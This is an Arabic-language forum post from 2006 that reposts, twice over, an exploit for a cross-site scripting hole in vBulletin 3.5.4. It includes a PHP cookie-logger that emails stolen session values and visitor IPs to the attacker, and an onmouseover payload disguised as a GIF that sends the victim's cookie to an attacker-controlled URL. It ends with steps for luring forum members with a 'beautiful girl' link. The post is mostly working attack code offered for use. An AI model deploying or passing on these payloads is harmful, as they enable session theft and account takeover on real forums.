أسير الليل
11-23-2006, 03:15 صباحاً
وباذن الله الموضوع يعجبكم ويفيدكم اكثر واكثر
تحياتي
black hours
وسأبدأ بثغرة ال vb3.5.4
اول ما حاولت احط الموضوع بالطريقه العادية حولني لصفحة الحماية لوووووول فطنشوا اللوج يعني
كود PHP:
From:SpiderZ <spiderzemail_(at)_libero.it> Date:27.03.2006Subject:Xss Vbulletin 3.5.x ( test: 3.5.4 )
كود PHP:
[center]__________________________________________________ _______________________
/ \
\ \ ,, / /
'-.`\()/`.-'
.--_'( )'_--.
/ /` /`""`\ `\ \ * SpiderZ ForumZ Security *
| | >< | |
\ \ / /
'.__.'
=> Xss Vbulletin 3.5.x ( test: 3.5.4 )
=> Author: SpiderZ
=> Sito: www.spiderz.tk
__________________________________________________ _______________________
( 1 )
--------------------------------------------------------------------
Name file: exploit.php
--------------------------------------------------------------------
<?php
$ip_adresse = $_SERVER['REMOTE_ADDR'];
if(!empty($ip_adresse))
{
echo 'il tuo ip и: ',$ip_adresse;
}
else
{
echo 'Impossible d\'afficher l\'IP';
}
?>
[/url]<?
$xx1=$HTTP_SERVER_VARS['SERVER_PORT'];
$day = date("d",time()); $month = date("m",time()); $year = date("Y",time());
if ($REMOTE_HOST == "") $visitor_info = $REMOTE_ADDR;
else $visitor_info = $REMOTE_HOST;
$base = 'http://' . $HTTP_SERVER_VARS['SERVER_NAME'] . $PHP_SELF;
$x1=`host $REMOTE_ADDR|grep Name`;
$x2=$REMOTE_PORT;
?>
<?php
$****** = $_GET['c'];
?>
<?php
$myemail = "YOUR ADDRESS E-MAIL";
$today = date("l, F j, Y, g:i a") ;
$subject = "Xss Vbulletin" ;
$message = "Xss: Hacking
Ip: $ip_adresse
******: $******
Url: $base
porta usata: $xx1
remote port: $x2
Giorno & Ora : $today \n
";
$from = "From: $myemail\r\n";
mail($myemail, $subject, $message, $from);
?>
--------------------------------------------------------------------
<?php
$myemail = "YOUR ADDRESS E-MAIL";
--------------------------------------------------------------------
( 2 )
--------------------------------------------------------------------
Name file: image.gif
--------------------------------------------------------------------
<pre a='>' onmouseover='document.location="http://YOUR ADDRESS WEB.com/exploit.php?c="+document.******' b='</pre' >
--------------------------------------------------------------------
location="http://YOUR ADDRESS WEB.com
--------------------------------------------------------------------
( 3 )
--------------------------------------------------------------------
Like Using
--------------------------------------------------------------------
1° new thread
2° [url="http://YOUR ADDRESS WEB.com/IMAGE.GIF"]BEAUTIFUL GIRL (log.php) '
3° Submit
4° It waits for
--------------------------------------------------------------------
#
تحياتي
black hours
وسأبدأ بثغرة ال vb3.5.4
اول ما حاولت احط الموضوع بالطريقه العادية حولني لصفحة الحماية لوووووول فطنشوا اللوج يعني
كود PHP:
From:SpiderZ <spiderzemail_(at)_libero.it> Date:27.03.2006Subject:Xss Vbulletin 3.5.x ( test: 3.5.4 )
كود PHP:
[center]__________________________________________________ _______________________
/ \
\ \ ,, / /
'-.`\()/`.-'
.--_'( )'_--.
/ /` /`""`\ `\ \ * SpiderZ ForumZ Security *
| | >< | |
\ \ / /
'.__.'
=> Xss Vbulletin 3.5.x ( test: 3.5.4 )
=> Author: SpiderZ
=> Sito: www.spiderz.tk
__________________________________________________ _______________________
( 1 )
--------------------------------------------------------------------
Name file: exploit.php
--------------------------------------------------------------------
<?php
$ip_adresse = $_SERVER['REMOTE_ADDR'];
if(!empty($ip_adresse))
{
echo 'il tuo ip и: ',$ip_adresse;
}
else
{
echo 'Impossible d\'afficher l\'IP';
}
?>
[/url]<?
$xx1=$HTTP_SERVER_VARS['SERVER_PORT'];
$day = date("d",time()); $month = date("m",time()); $year = date("Y",time());
if ($REMOTE_HOST == "") $visitor_info = $REMOTE_ADDR;
else $visitor_info = $REMOTE_HOST;
$base = 'http://' . $HTTP_SERVER_VARS['SERVER_NAME'] . $PHP_SELF;
$x1=`host $REMOTE_ADDR|grep Name`;
$x2=$REMOTE_PORT;
?>
<?php
$****** = $_GET['c'];
?>
<?php
$myemail = "YOUR ADDRESS E-MAIL";
$today = date("l, F j, Y, g:i a") ;
$subject = "Xss Vbulletin" ;
$message = "Xss: Hacking
Ip: $ip_adresse
******: $******
Url: $base
porta usata: $xx1
remote port: $x2
Giorno & Ora : $today \n
";
$from = "From: $myemail\r\n";
mail($myemail, $subject, $message, $from);
?>
--------------------------------------------------------------------
<?php
$myemail = "YOUR ADDRESS E-MAIL";
--------------------------------------------------------------------
( 2 )
--------------------------------------------------------------------
Name file: image.gif
--------------------------------------------------------------------
<pre a='>' onmouseover='document.location="http://YOUR ADDRESS WEB.com/exploit.php?c="+document.******' b='</pre' >
--------------------------------------------------------------------
location="http://YOUR ADDRESS WEB.com
--------------------------------------------------------------------
( 3 )
--------------------------------------------------------------------
Like Using
--------------------------------------------------------------------
1° new thread
2° [url="http://YOUR ADDRESS WEB.com/IMAGE.GIF"]BEAUTIFUL GIRL (log.php) '
3° Submit
4° It waits for
--------------------------------------------------------------------
#